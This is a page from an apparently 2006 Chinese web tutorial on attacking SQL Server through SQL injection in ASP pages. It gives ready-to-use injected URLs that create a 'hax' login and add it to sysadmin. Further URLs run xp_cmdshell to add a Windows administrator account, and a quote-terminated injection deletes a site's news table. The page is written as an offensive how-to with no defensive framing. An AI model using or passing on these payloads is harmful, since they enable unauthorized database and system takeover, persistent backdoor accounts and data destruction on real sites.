WEB开发网
开发学院数据库MSSQL Server SQL Server安全专题"SQL Server数据库的一些攻击 阅读

SQL Server安全专题"SQL Server数据库的一些攻击

 2006-12-30 09:16:52 来源:WEB开发网   
核心提示: news.asp?id=2;exec sp_addlogin hax;--后面的--符号把sp_addlogin后的判断语句变成了注释,这样就不会有语法错误了,SQL Server安全专题"SQL Server数据库的一些攻击(2),sp_addlogin正常执行!那么我们连一起
news.asp?id=2;exec sp_addlogin hax;--  

后面的--符号把sp_addlogin后的判断语句变成了注释,这样就不会有语法错误了,sp_addlogin正常执行!

那么我们连一起来用吧

news.asp?id=2;exec master.dbo.sp_addlogin hax;--

news.asp?id=2;exec master.dbo.sp_password null,hax,hax;--

news.asp?id=2;exec master.dbo.sp_addsrvrolemember sysadmin hax;--

news.asp?id=2;exec master.dbo.xp_cmdshell 'net user hax hax /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--

news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators hax /add';--

这样,你在他的数据库和系统内都留下了hax管理员账号了

当然,前提条件是ASP用管理员账号,所以虚拟空间大家就别试了,不会存在这个漏洞的。

以后我们会讨论,如果对方的ASP不是用SQL管理员账号,我们如何入侵,当然也会涉及到1433端口的入侵

当然大家可以试试看在id=2后面加上一个'符号,主要看对方的ASP怎么写了

再说说当ASP程序使用的SQL账号不是管理员的时候我们该如何做。

假设有如下页面

http://www.xxxxx.com/news/news-2.asp?newid=117

大家可以试试看http://www.xxxxx.com/news/news-2.asp?newid=117;select 123;--

呵呵,报语法错误,select 123错误,显而易见,天融新的ASP在newid变量后面用'号结束

那么试试看http://www.xxxxx.com/news/news-2.asp?newid=117';delete news;--

哈哈,我想只要表名猜对了,新闻库就被删了

通常ASP用的SQL账号就算不是管理员也会是某个数据库的owner,至少对于这个库有很高的管理权限

上一页  1 2 3 4 5 6 7  下一页

Tags:SQL Server 安全

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接